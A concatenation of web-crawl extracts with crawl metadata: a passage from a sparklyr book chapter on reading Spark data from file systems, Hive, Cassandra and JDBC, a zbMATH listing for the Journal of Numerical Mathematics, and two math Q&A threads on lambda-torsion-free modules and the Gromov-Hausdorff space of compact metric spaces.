Spark is a very flexible computing platform: it can add functionality through extension programs, called packages, and you can access a new source type or file system by using the appropriate one. Packages need to be loaded into Spark at connection time; to load a package, Spark needs its location, which could be inside the cluster, in a file share, or on the internet. In sparklyr, package locations are listed in the sparklyr.connect.packages entry of the connection configuration passed to spark_connect().

Loading the appropriate package is the first of two steps. The second step is to actually read or write the data, which the spark_read_source() and spark_write_source() functions do; they are generic functions that can use the libraries imported by a package. For instance, we can read XML files as follows:

```r
sc <- spark_connect(master = "local", version = "2.3", config = list(
  sparklyr.connect.packages = "com.databricks:spark-xml_2.11:0.5.0"))

writeLines("<ROWS><ROW><text>Hello World</text></ROW></ROWS>", "simple.xml")
spark_read_source(sc, "simple_xml", "simple.xml", "xml")
```

```
# Source: spark<data> [?? x 1]
  text       
  <chr>      
1 Hello World
```

You can also write back to XML with ease, as follows:

```r
tbl(sc, "simple_xml") %>%
  spark_write_source("xml", options = list(path = "data.xml"))
```

In addition, there are a few extensions developed by the R community to load additional file formats, such as sparklyr.nested to assist with nested data, spark.sas7bdat to read data from SAS, sparkavro to read data in AVRO format, and sparkwarc to read WARC files; these use the extensibility mechanisms introduced in Chapter 10. Chapter 11 presents techniques for using R packages to load additional file formats, and Chapter 13 presents techniques for using Java libraries to complement this further. But first, let's explore how to retrieve and store files across several different file systems.

## 8.6 File Systems

Spark defaults to the file system on which it is currently running. In a YARN-managed cluster, the default file system is HDFS, so an example path of /home/user/file.csv is read from the cluster's HDFS folders, not the Linux folders. For other deployments, such as Standalone and sparklyr's local mode, the operating system's file system is used instead.

The file system protocol can be changed when reading or writing through the path argument of the sparklyr functions. For example, a full path of file://home/user/file.csv forces the use of the local operating system's file system.
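For instance, a small hedged sketch (the table name is made up, and the path mirrors the one above):

```r
# The protocol prefix in the path overrides the default file system,
# forcing the local disk even when the cluster's default is HDFS.
spark_read_csv(sc, name = "local_file", path = "file://home/user/file.csv")
```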
There are many other file system protocols, such as dbfs:// for Databricks' file system, s3a:// for Amazon's S3 service, wasb:// for Microsoft Azure storage, and gs:// for Google storage. Spark does not support all of them directly; instead, they are configured as needed. For instance, accessing the "s3a" protocol requires adding a package to the sparklyr.connect.packages configuration setting, and connecting with appropriate credentials might require setting the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY environment variables:

```r
Sys.setenv(AWS_ACCESS_KEY_ID = my_key_id)
Sys.setenv(AWS_SECRET_ACCESS_KEY = my_secret_key)

sc <- spark_connect(master = "local", version = "2.3", config = list(
  sparklyr.connect.packages = "<s3a-support-package>"))  # placeholder: the
  # required artifact was not specified in the source; use the one matching
  # your Hadoop version

my_file <- spark_read_csv(sc, "my-file", path = "s3a://my-bucket/my-file.csv")
```

Accessing other file protocols requires loading different packages, although in some cases the vendor providing the Spark environment might load the package for you; refer to your vendor's documentation to find out whether that is the case.

## 8.7 Storage Systems

A data lake and Spark usually go hand in hand, with optional access to storage systems like databases and data warehouses. Presenting all the different storage systems with appropriate examples would be quite time-consuming, so instead we present some of the most commonly used ones.

As a start, Apache Hive is data warehouse software that facilitates reading, writing, and managing large datasets residing in distributed storage using SQL; in fact, Spark has components from Hive built directly into its sources. It is very common to have installations of Spark and Hive side by side, so we start by presenting Hive, followed by Cassandra, and close by looking at JDBC connections.

### 8.7.1 Hive

In YARN-managed clusters, Spark provides a deeper integration with Apache Hive: Hive tables are easily accessible after opening a Spark connection. You can access a Hive table's data using DBI by referencing the table in a SQL statement:

```r
sc <- spark_connect(master = "local", version = "2.3")
spark_read_csv(sc, "test", "data-csv/", memory = FALSE)

DBI::dbGetQuery(sc, "SELECT * FROM test limit 10")
```

Another way to reference a table is with dplyr, using the tbl() function to retrieve a reference to it:

```r
dplyr::tbl(sc, "test")
```

It is important to reiterate that no data is imported into R; tbl() only creates a reference. You can then pipe more dplyr verbs after the tbl() call:

```r
dplyr::tbl(sc, "test") %>%
  dplyr::group_by(y) %>%
  dplyr::summarise(totals = sum(y))
```

Hive table references assume a default database source. Often, the needed table is in a different database within the metastore. To access it using SQL, prefix the database name to the table name, separated by a period:

```r
DBI::dbSendQuery(sc, "SELECT * FROM databasename.table")
```

In dplyr, the in_schema() function serves the same purpose; it is used inside the tbl() call:

```r
tbl(sc, dbplyr::in_schema("databasename", "table"))
```

You can also use the tbl_change_db() function to set the current session's default database; any subsequent call via DBI or dplyr then uses the selected name as the default database:

```r
tbl_change_db(sc, "databasename")
```

The following examples require additional Spark packages and databases, so they might be difficult to follow unless you happen to have a JDBC driver or a Cassandra database accessible to you:

```r
spark_disconnect(sc)
```

Next, we explore a less structured storage system, often referred to as a NoSQL database.
### 8.7.2 Cassandra

Apache Cassandra is a free and open source, distributed, wide-column store, NoSQL database management system designed to handle large amounts of data across many commodity servers. While there are many other database systems beyond Cassandra, taking a quick look at how Cassandra can be used from Spark gives you insight into how to make use of other database and storage systems, like Solr, Redshift, Delta Lake, and others.

The following example shows how to use the datastax:spark-cassandra-connector package to read from Cassandra. The key is to use the org.apache.spark.sql.cassandra library as the source argument; it provides the mapping Spark needs to make sense of the data source. Unless you have a Cassandra database, skip executing the following statements:

```r
sc <- spark_connect(master = "local", version = "2.3", config = list(
  sparklyr.connect.packages = "datastax:spark-cassandra-connector:2.3.1-s_2.11"))

spark_read_source(
  sc,
  name = "emp",
  source = "org.apache.spark.sql.cassandra",
  options = list(keyspace = "dev", table = "emp"),
  memory = FALSE)
```

One of the most useful features of Spark when dealing with external databases and data warehouses is that it can push computation down to the database, a feature known as pushdown predicates. In a nutshell, pushdown predicates improve performance by asking the remote database smart questions: when you execute a query containing a filter(age > 20) expression against a remote table referenced through spark_read_source() and not loaded into memory, rather than bringing the entire table into Spark, the filter is passed to the remote database and only the matching subset of the table is retrieved.

While it is ideal to find Spark packages that support the remote storage system, there will be times when no package is available and you need to consider vendor JDBC drivers.

### 8.7.3 JDBC

When a Spark package is not available to provide connectivity, you can consider a JDBC connection. JDBC is an interface for the Java programming language that defines how a client can access a database. Connecting to a remote database with spark_read_jdbc() and spark_write_jdbc() is quite easy, as long as you have access to the appropriate JDBC driver, which at times is trivial and at other times is quite an adventure.

To keep this simple, consider how a connection to a remote MySQL database could be accomplished. First, you would download the appropriate JDBC driver from MySQL's developer portal and specify it as a sparklyr.shell.driver-class-path connection option; since JDBC drivers are Java-based, the code is contained within a JAR (Java ARchive) file. Once connected to Spark with the appropriate driver, you can use the jdbc:// protocol to access particular drivers and databases. Unless you are willing to download and configure MySQL on your own, skip executing the following statement (the driver path was not specified in the source, so a placeholder is used, and the table name is reconstructed from the dbtable option):

```r
sc <- spark_connect(master = "local", version = "2.3", config = list(
  "sparklyr.shell.driver-class-path" = "<path-to-mysql-jdbc-driver>.jar"))  # placeholder

spark_read_jdbc(sc, "person", options = list(
  url = "jdbc:mysql://localhost:3306/sparklyr",
  dbtable = "person"))
```

If you are a customer of a particular database vendor, the vendor-provided resources are usually the best place to start looking for appropriate drivers.
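Writing back through JDBC mirrors the read. A hedged sketch, reusing the placeholder driver configuration and URL from above (the target table name is made up):

```r
# Write a Spark table back to the remote database over the same driver.
tbl(sc, "person") %>%
  spark_write_jdbc(name = "person_copy", options = list(
    url = "jdbc:mysql://localhost:3306/sparklyr"))
```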
## 8.8 Recap

This chapter expanded on how and why you should use Spark to connect to and process a variety of data sources through a storage pattern known as the data lake, which provides more flexibility than standard ETL processes by letting you work with raw datasets that, potentially, carry more information to enrich data analysis and modeling. We also presented best practices for reading, writing, and copying data into and out of Spark.

We then returned to the components of a data lake: file formats and file systems, the former representing how data is stored and the latter where it is stored. You learned how to tackle file formats and storage systems that require additional Spark packages, reviewed some of the performance trade-offs across file formats, and learned the concepts required to make use of storage systems (databases and warehouses) in Spark.

While reading and writing datasets should now come naturally to you, you might still hit resource restrictions when handling large datasets. To address these situations, Chapter 9 shows how Spark manages tasks and data across multiple machines, which in turn lets you further improve the performance of your analysis and modeling tasks.

¹ Codd EF (1970). "A relational model of data for large shared data banks."
https://zbmath.org/serials/?q=se%3A2957
# zbMATH — the first resource for mathematics ## Journal of Numerical Mathematics Short Title: J. Numer. Math. Publisher: De Gruyter, Berlin ISSN: 1570-2820; 1569-3953/e Online: http://www.degruyter.com/view/j/jnma Predecessor: East-West Journal of Numerical Mathematics Comments: Indexed cover-to-cover Documents Indexed: 298 Publications (since 2002) References Indexed: 189 Publications with 4,208 References. all top 5 #### Latest Issues 29, No. 2 (2021) 29, No. 1 (2021) 28, No. 4 (2020) 28, No. 3 (2020) 28, No. 2 (2020) 28, No. 1 (2020) 27, No. 4 (2019) 27, No. 3 (2019) 27, No. 2 (2019) 27, No. 1 (2019) 26, No. 4 (2018) 26, No. 3 (2018) 26, No. 2 (2018) 26, No. 1 (2018) 25, No. 4 (2017) 25, No. 3 (2017) 25, No. 2 (2017) 25, No. 1 (2017) 24, No. 4 (2016) 24, No. 3 (2016) 24, No. 2 (2016) 24, No. 1 (2016) 23, No. 4 (2015) 23, No. 3 (2015) 23, No. 2 (2015) 23, No. 1 (2015) 22, No. 4 (2014) 22, No. 3 (2014) 22, No. 2 (2014) 22, No. 1 (2014) 21, No. 4 (2013) 21, No. 3 (2013) 21, No. 2 (2013) 21, No. 1 (2013) 20, No. 3-4 (2012) 20, No. 2 (2012) 20, No. 1 (2012) 19, No. 4 (2011) 19, No. 3 (2011) 19, No. 2 (2011) 19, No. 1 (2011) 18, No. 4 (2010) 18, No. 3 (2010) 18, No. 2 (2010) 18, No. 1 (2010) 17, No. 4 (2009) 17, No. 3 (2009) 17, No. 2 (2009) 17, No. 1 (2009) 16, No. 4 (2008) 16, No. 3 (2008) 16, No. 2 (2008) 16, No. 1 (2008) 15, No. 4 (2007) 15, No. 3 (2007) 15, No. 2 (2007) 15, No. 1 (2007) 14, No. 4 (2006) 14, No. 3 (2006) 14, No. 2 (2006) 14, No. 1 (2006) 13, No. 4 (2005) 13, No. 3 (2005) 13, No. 2 (2005) 13, No. 1 (2005) 12, No. 4 (2004) 12, No. 3 (2004) 12, No. 2 (2004) 12, No. 1 (2004) 11, No. 4 (2003) 11, No. 3 (2003) 11, No. 2 (2003) 11, No. 1 (2003) 10, No. 4 (2002) 10, No. 3 (2002) 10, No. 2 (2002) 10, No. 1 (2002) all top 5 #### Authors 13 Hoppe, Ronald H. W. 7 Kuznetsov, Yurii Alekseevich 6 Bangerth, Wolfgang 6 Glowinski, Roland 6 Kanschat, Guido 6 Maier, Matthias Sebastian 6 Rannacher, Rolf 6 Repin, Sergeĭ Igorevich 6 Rivière, Beatrice M. 6 Turcksin, Bruno 5 Heister, Timo 5 Heltai, Luca 5 Kronbichler, Martin 5 Nicaise, Serge 4 Arndt, Daniel 4 Axelsson, Axel Owe Holger 4 Carstensen, Carsten 4 Davydov, Denis 4 Kadalbajoo, Mohan K. 4 Pelteret, Jean-Paul 4 Schieweck, Friedhelm 4 Suttmeier, Franz-Theo 4 Turek, Stefan 3 Agouzal, Abdellatif 3 Chen, Hongsen 3 Feistauer, Miloslav 3 Girault, Vivette 3 Hackbusch, Wolfgang 3 Langer, Ulrich 3 Pasciak, Joseph E. 3 Rebholz, Leo G. 3 Seaïd, Mohammed 3 Steinbach, Olaf 2 Bacuta, Constantin 2 Banda, Mapundi Kondwani 2 Benner, Peter 2 Boglaev, Igor P. 2 Bonito, Andrea 2 Borzì, Alfio 2 Bramble, James H. 2 Caboussat, Alexandre 2 Chen, Zhangxin 2 Clevenger, Thomas C. 2 Demyanko, Kirill V. 2 Dryja, Maksymilian 2 Eymard, Robert 2 Fehling, Marc 2 Foss, F. J. II. 2 Gatica, Gabriel N. 2 Gerardo-Giorda, Luca 2 Hecht, Frédéric 2 Herbin, Raphaèle 2 Hinze, Michael 2 Hiptmair, Ralf 2 Hussain, Malik Zawwar 2 Ikhile, Monday Ndidi Oziegbe 2 Kamont, Zdzisław 2 Kučera, Václav 2 Kumar, Devendra 2 Li, Cuixia 2 Lipnikov, Konstantin N. 2 Lukáčová-Medvid’ová, Mária 2 Meszmer, Peter 2 Moore, Peter K. 2 Nataf, Frédéric 2 Nechepurenko, Yuri M. 2 Neilan, Michael 2 Neittaanmäki, Pekka J. 2 Novati, Paolo 2 Okuonghae, Robert I. 2 Ouazzi, Abderrahim 2 Owolabi, Kolade Matthew 2 Pani, Amiya Kumar 2 Rabus, Hella 2 Reusken, Arnold 2 Şahin, Niyazi 2 Schroder, Andreas 2 She, Bangwei 2 Sobotíková, Veronika 2 Šolín, Pavel 2 Soualem, Nadir 2 Sweilam, Nasser Hassan 2 Vassilevski, Yuri V. 2 Vihharev, Jevgeni 2 Xu, Jinchao 2 Yüzbaşı, Şuayip 2 Zhou, Zhaojie 2 Zikatanov, Ludmil T. 
1 Aarnes, Jørg E. 1 Abdi, Ali 1 Achchab, A. 1 Alonso-Mallo, Isaías 1 Alzetta, Giovanni 1 Amani, Sanaz 1 An, Rong 1 Angelova, Ivanka Tr. 1 Annaby, Mahmoud H. 1 Antil, Harbir 1 Anton, François 1 Apel, Thomas ...and 380 more Authors all top 5 #### Fields 275 Numerical analysis (65-XX) 124 Partial differential equations (35-XX) 63 Fluid mechanics (76-XX) 26 Calculus of variations and optimal control; optimization (49-XX) 20 Ordinary differential equations (34-XX) 13 Mechanics of deformable solids (74-XX) 13 Operations research, mathematical programming (90-XX) 8 Integral equations (45-XX) 8 Optics, electromagnetic theory (78-XX) 6 Approximations and expansions (41-XX) 3 Functional analysis (46-XX) 3 Probability theory and stochastic processes (60-XX) 3 Classical thermodynamics, heat transfer (80-XX) 3 Biology and other natural sciences (92-XX) 3 Systems theory; control (93-XX) 2 Linear and multilinear algebra; matrix theory (15-XX) 2 Integral transforms, operational calculus (44-XX) 2 Operator theory (47-XX) 2 Computer science (68-XX) 2 Statistical mechanics, structure of matter (82-XX) 1 General and overarching topics; collections (00-XX) 1 Field theory and polynomials (12-XX) 1 Real functions (26-XX) 1 Dynamical systems and ergodic theory (37-XX) 1 Harmonic analysis on Euclidean spaces (42-XX) 1 Quantum theory (81-XX) 1 Game theory, economics, finance, and other social and behavioral sciences (91-XX) #### Citations contained in zbMATH Open 221 Publications have been cited 2,111 times in 1,950 Documents Cited by Year New development in freefem++. Zbl 1266.68090 Hecht, F. 2012 The deal.II library, version 8.4. Zbl 1348.65187 Bangerth, Wolfgang; Davydov, Denis; Heister, Timo; Heltai, Luca; Kanschat, Guido; Kronbichler, Martin; Maier, Matthias; Turcksin, Bruno; Wells, David 2016 The deal.II library, version 8.5. Zbl 1375.65148 Arndt, Daniel; Bangerth, Wolfgang; Davydov, Denis; Heister, Timo; Heltai, Luca; Kronbichler, Martin; Maier, Matthias; Pelteret, Jean-Paul; Turcksin, Bruno; Wells, David 2017 Hierarchical Kronecker tensor-product approximations. Zbl 1081.65035 Hackbusch, W.; Khoromskij, B. N.; Tyrtyshnikov, E. E. 2005 A staggered discontinuous Galerkin method for the convection-diffusion equation. Zbl 1300.65065 Chung, Eric; Lee, C. S. 2012 Analysis of time-dependent Navier-Stokes flow coupled with Darcy flow. Zbl 1159.76010 Çeşmelioğlu, A.; Rivière, B. 2008 The deal.II library, version 9.0. Zbl 1410.65363 Alzetta, Giovanni; Arndt, Daniel; Bangerth, Wolfgang; Boddu, Vishal; Brands, Benjamin; Davydov, Denis; Gassmöller, Rene; Heister, Timo; Heltai, Luca; Kormann, Katharina; Kronbichler, Martin; Maier, Matthias; Pelteret, Jean-Paul; Turcksin, Bruno; Wells, David 2018 Duality-based adaptivity in the $$hp$$-finite element method. Zbl 1050.65111 Heuveline, V.; Rannacher, R. 2003 The deal.II library, Version 9.1. Zbl 1435.65010 Arndt, Daniel; Bangerth, Wolfgang; Clevenger, Thomas C.; Davydov, Denis; Fehling, Marc; Garcia-Sanchez, Daniel; Harper, Graham; Heister, Timo; Heltai, Luca; Kronbichler, Martin; Kynch, Ross Maguire; Maier, Matthias; Pelteret, Jean-Paul; Turcksin, Bruno; Wells, David 2019 Goal-oriented error control of the iterative solution of finite element equations. Zbl 1169.65340 Meidner, D.; Rannacher, R.; Vihharev, J. 2009 Overlapping Schwarz methods in H(curl) on polyhedral domains. Zbl 1017.65099 Pasciak, J. E.; Zhao, J. 2002 Layer-adapted meshes for one-dimensional reaction-convection-diffusion problems. Zbl 1056.65076 Linß, T. 
2004 A posteriori error control of a state constrained elliptic control problem. Zbl 1161.65049 Günther, A.; Hinze, M. 2008 Discontinuous Galerkin method of lines for solving nonstationary singularly perturbed linear problems. Zbl 1059.65083 2004 A posteriori error estimation of finite element approximations of pointwise state constrained distributed control problems. Zbl 1178.65070 Hoppe, R. H. W.; Kieweg, M. 2009 $$A$$-stable discontinuous Galerkin-Petrov time discretization of higher order. Zbl 1198.65093 Schieweck, F. 2010 Analysis of the Chang-Cooper discretization scheme for a class of Fokker-Planck equations. Zbl 1327.35371 2015 A second-order scheme for singularly perturbed differential equations with discontinuous source term. Zbl 1023.65077 Roos, H.-G.; Zarin, H. 2002 Numerical solution of the infinite-dimensional LQR problem and the associated Riccati differential equations. Zbl 1444.65032 Benner, Peter; Mena, Hermann 2018 The all-floating boundary element tearing and interconnecting method. Zbl 1423.74943 Of, G.; Steinbach, O. 2009 Adaptive finite element solution of eigenvalue problems: Balancing of discretization and iteration error. Zbl 1222.65123 Rannacher, R.; Westenberger, A.; Wollner, W. 2010 Elastoviscoplastic finite element analysis in 100 lines of Matlab. Zbl 1099.74544 Carstensen, C.; Klose, R. 2002 Higher order Galerkin time discretizations and fast multigrid solvers for the heat equation. Zbl 1218.65107 Hussain, S.; Schieweck, F.; Turek, S. 2011 Mathematical study of multispecies dynamics modeling predator-prey spatial interactions. Zbl 1364.35147 2017 Convergence analysis of an adaptive edge finite element method for the 2D eddy current equations. Zbl 1073.78008 Carstensen, C.; Hoppe, R. H. W. 2005 Regularity estimates for elliptic boundary value problems with smooth data on polygonal domains. Zbl 1050.65108 Bacuta, C.; Bramble, J. H.; Xu, J. 2003 A posteriori error estimates for adaptive finite element discretizations of boundary control problems. Zbl 1104.65066 Hoppe, R. H. W.; Iliash, Y.; Iyyunni, C.; Sweilam, N. H. 2006 Local error analysis of the interior penalty discontinuous Galerkin method for second order elliptic problems. Zbl 1022.65123 Kanschat, G.; Rannacher, R. 2002 Higher-order relaxation schemes for hyperbolic systems of conservation laws. Zbl 1084.65076 Banda, M. K.; Seaid, M. 2005 Convergence analysis and error estimates for mixed finite element method on distorted meshes. Zbl 1069.65114 Kuznetsov, Yu.; Repin, S. 2005 A posteriori error estimation of goal-oriented quantities by a superconvergence patch recovery. Zbl 1039.65075 Korotov, S.; Neittaanmäki, P.; Repin, S. 2003 Pressure-robust analysis of divergence-free and conforming FEM for evolutionary incompressible Navier-Stokes flows. Zbl 1388.76151 Schroeder, Philipp W.; Lube, Gert 2017 Convergence analysis of finite element methods for $$H(\mathrm{div};\Omega )$$-elliptic interface problems. Zbl 1203.65227 Hiptmair, R.; Li, J.; Zou, J. 2010 Efficient MHD Riemann solvers for simulations on unstructured triangular grids. Zbl 1037.76038 Wesenberg, M. 2002 Distributed optimal control of lambda-omega systems. Zbl 1104.65063 Borzì, A.; Griesse, R. 2006 Unified edge-oriented stabilization of nonconforming FEM for incompressible flow problems: numerical investigations. Zbl 1219.76030 Turek, S.; Ouazzi, A. 2007 Analysis of the Scott-Zhang interpolation in the fractional order Sobolev spaces. Zbl 1457.65190 Ciarlet, P. jun. 
2013 Multiharmonic finite element analysis of a time-periodic parabolic optimal control problem. Zbl 1284.65078 Langer, U.; Wolfmayr, M. 2013 Convergence and stability of finite element modified method of characteristics for the incompressible Navier-Stokes equations. Zbl 1120.76038 El-Amrani, M.; Seaid, M. 2007 Adaptive finite element analysis of nonlinear problems: balancing of discretization and iteration errors. Zbl 1267.65184 Rannacher, R.; Vihharev, J. 2013 Approximating eigenvalues of discontinuous problems by sampling theorems. Zbl 1160.65039 Annaby, M. H.; Asharabi, R. M. 2008 Preconditioning methods for eddy-current optimally controlled time-harmonic electromagnetic problems. Zbl 1428.65040 Axelsson, Owe; Lukáš, Dalibor 2019 Error analysis for a monolithic discretization of coupled Darcy and Stokes problems. Zbl 1302.76101 Girault, V.; Kanschat, G.; Rivière, B. 2014 A scenario for symmetry breaking in Caffarelli-Kohn-Nirenberg inequalities. Zbl 1267.65075 Dolbeault, J.; Esteban, M. J. 2012 Optimality of local multilevel methods on adaptively refined meshes for elliptic boundary value problems. Zbl 1194.65147 Xu, X.; Chen, H.; Hoppe, R. H. W. 2010 Exponential decay of a finite volume scheme to the thermal equilibrium for drift-diffusion systems. Zbl 1376.82105 Bessemoulin-Chatard, Marianne; Chainais-Hillairet, Claire 2017 A variable order wavelet method for the sparse representation of layer potentials in the non-standard form. Zbl 1063.65133 Tausch, J. 2004 A least-squares approximation method for the time-harmonic Maxwell equations. Zbl 1126.78016 Bramble, J. H.; Kolev, T. V.; Pasciak, J. E. 2005 Optimized Schwarz methods for unsymmetric layered problems with strongly discontinuous and anisotropic coefficients. Zbl 1092.65112 Gerardo-Giorda, L.; Nataf, F. 2005 Local analysis of discontinuous Galerkin methods applied to singularly perturbed problems. Zbl 1099.65108 Guzmán, J. 2006 Cell centred discretisation of non linear elliptic problems on general multidimensional polyhedral grids. Zbl 1179.65138 Eymard, R.; Gallouët, T.; Herbin, R. 2009 On the convergence of Halley’s method for simultaneous computation of polynomial zeros. Zbl 1328.65110 Proinov, Petko D.; Ivanov, Stoil I. 2015 A fully-mixed finite element method for the Navier-Stokes/Darcy coupled problem with nonlinear viscosity. Zbl 1367.65167 Caucao, Sergio; Gatica, Gabriel N.; Oyarzúa, Ricardo; Šebestová, Ivana 2017 A parallel Crank-Nicolson finite difference method for time-fractional parabolic equation. Zbl 1302.65237 Sweilam, N. H.; Moharram, H.; Moniem, N. K. Abdel; Ahmed, S. 2014 Functional a posteriori error estimates for problems with nonlinear boundary conditions. Zbl 1146.65054 Repin, S.; Valdman, J. 2008 Numerical approximation of the spectra of non-compact operators arising in buckling problems. Zbl 1099.74545 Dauge, M.; Suri, M. 2002 On sinc quadrature approximations of fractional powers of regularly accretive operators. Zbl 07089643 Bonito, Andrea; Lei, Wenyu; Pasciak, Joseph E. 2019 Analysis of two-scale finite volume element method for elliptic problem. Zbl 1067.65124 Ginting, V. 2004 $$L_{2}$$ error estimates for a nonstandard finite element method on polyhedral meshes. Zbl 1222.65119 Hofreither, C. 2011 Angles between subspaces and their tangents. Zbl 1286.65052 Zhu, Peizhen; Knyazev, A. V. 2013 On improvement of the iterated Galerkin solution of the second kind integral equations. Zbl 1088.65115 Kulkarni, R. P. 2005 On a discrete Hessian recovery for $$P_1$$ finite elements. 
2021-09-23 09:55:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5729230046272278, "perplexity": 8028.348383367742}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057417.92/warc/CC-MAIN-20210923074537-20210923104537-00472.warc.gz"}
https://math.stackexchange.com/questions/2002058/modules-over-ring-of-formal-power-series
# Modules over ring of formal power series I am facing the following question: Let $K$ be a commutative unital ring (it can be taken to be $\mathbb{R}$ or $\mathbb{C}$), and let $K[[\lambda]]$ be the associated ring of formal power series. I know that if $M$ is a $K$-module, then $M[[\lambda]]$ inherits a natural $K[[\lambda]]$-module structure. The question is: what condition ensures that a given $K[[\lambda]]$-module, say ${\cal M}$, is of the form $M_0[[\lambda]],$ for some $K$-module $M_0$? I found the answer in the paper "Algebraic cohomology and deformation theory" by M. Gerstenhaber and D. Schack, published in the book "Deformation theory of algebras and structures and applications". There the following is stated, without proof: A $K[[\lambda]]$-module ${\cal M}$ is of the form $M_0[[\lambda]]$ if and only if ${\cal M}$ is $\lambda$-adically complete and $\lambda$-torsion free, in which case $M_0 = {\cal M}/\lambda{\cal M}.$ Trying to prove the "if" part, I consider the following map $$M_0[[\lambda]]\rightarrow {\cal M};\ \ \sum_{j=0}^\infty\lambda^j[x]_j\mapsto\sum_{j=0}^\infty\lambda^jx_j.$$ Then the series in ${\cal M}$ converges, due to the $\lambda$-adic completeness of ${\cal M},$ for any choice of the representative $x_j$ of $[x]_j,$ yet I can't prove that the limit is independent of the representative. I suppose that can be shown using the $\lambda$-torsion free property, but then I realised that I don't even have a clear idea of what exactly that property means. So, now my question is: What is the definition of a $\lambda$-torsion free $K[[\lambda]]$-module? Also, the map proposed above is the "natural one" for me. But I am not sure that it is the right one to solve the problem. Perhaps, once I get the right definition of a $\lambda$-torsion free module, I can decide if the map is the one needed. Thanks in advance for any help. • If $r\in R$ and $M$ is an $R$-module, the $r$-torsion in $M$ is the set of nonzero elements such that $rm=0$, and $M$ is $r$-torsion free if there is no $r$-torsion. Phrased differently, $M$ is $r$-torsion free if the map $r:M\to M$ given by multiplication by $r$ is an injection. – Aaron Nov 10 '16 at 20:26 • That seems a reasonable definition; could you tell me where you took it from? Also, adapting that definition when $I\subset R$ is an ideal could be that $0\neq x\in M$ is an $I$-torsion element if $Ix = 0$? And thus the module $M$ would be $I$-torsion free if it has no $I$-torsion elements. Anyway, if that is the right definition, it seems that the map I proposed to prove the assertion I am interested in does not work. – Inocencio Nov 11 '16 at 18:48 • Not where I got the definition, but you should look here. In particular, they define $S$-torsion for $S$ a multiplicatively closed set (not necessarily an ideal), and it's not that all of $S$ annihilates $m$, but rather that some $s\in S$ does. This definition seems useful when talking about localization. – Aaron Nov 11 '16 at 19:10
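To make the definition settled in the comments explicit (this is the standard usage; it is not taken from the Gerstenhaber-Schack paper): $$\mathcal{M}\ \text{is }\lambda\text{-torsion free}\ \iff\ \bigl(\forall m\in\mathcal{M}:\ \lambda m = 0 \Rightarrow m = 0\bigr),$$ i.e. multiplication by $\lambda$ is an injection $\mathcal{M}\to\mathcal{M}$; by induction, multiplication by $\lambda^n$ is then injective for every $n\geq 1$.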
2019-05-25 07:49:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.917498767375946, "perplexity": 128.95613241945665}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232257920.67/warc/CC-MAIN-20190525064654-20190525090654-00038.warc.gz"}
https://mathoverflow.net/questions/161529/the-space-of-all-compact-metric-spaces-with-gromov-hausdorff-distance
# The space of all compact metric spaces with Gromov-Hausdorff distance Given two metric spaces $(X_1,d_1),(X_2,d_2)$ one can define $d_{GH}(X_1,X_2)$---the Gromov-Hausdorff distance between them. For compact spaces it is $0$ iff $X_1$ and $X_2$ are isometric. One can therefore form the space $\mathcal{X}$ of all (isometry classes of) compact metric spaces. I would like to know whether there is some model for this space, i.e. a metric space $Y$ which is homeomorphic (or, better, isometric) to $\mathcal{X}$. • Since a compact metric space has at most the cardinality of the continuum, one could simply pick one isometric copy of each compact metric space in which the points are real numbers, and this set with the Gromov-Hausdorff distance is a proper metric space. – Michael Greinecker Mar 26 '14 at 22:16 • @MichaelGreinecker: I think the question is whether $\mathcal{X}$ is homeomorphic/isometric to some more familiar or more easily constructed metric space. – Nate Eldredge Mar 26 '14 at 23:52 • Is it at least known that the space of compact metric spaces modulo isometry is separable? This reminds me of a similar result of Pisier asserting that for each $n\geqslant 2$ the space of $n$-dimensional operator spaces, $O_n$, is non-separable. I am wondering if one could embed $O_n$ in your space. – Tomek Kania Oct 18 '14 at 20:54 • I believe the set of finite metric spaces with pairwise rational distances is dense in the Gromov-Hausdorff space of compact metric spaces. – Noah Schweber Jul 27 '15 at 19:11 • @NoahSchweber Yes, that looks correct. You can post it as an answer. – nbarto Oct 4 '18 at 11:48
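For reference, one standard (and equivalent to the usual alternative) formulation of the distance used above, supplied here since the question does not spell it out: $$d_{GH}(X_1,X_2) = \inf_{Z,\,f,\,g}\, d_H^{Z}\bigl(f(X_1),\, g(X_2)\bigr),$$ where the infimum is taken over all metric spaces $Z$ and all isometric embeddings $f\colon X_1\to Z$ and $g\colon X_2\to Z$, and $d_H^{Z}$ denotes the Hausdorff distance between subsets of $Z$.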
2019-02-21 00:34:13
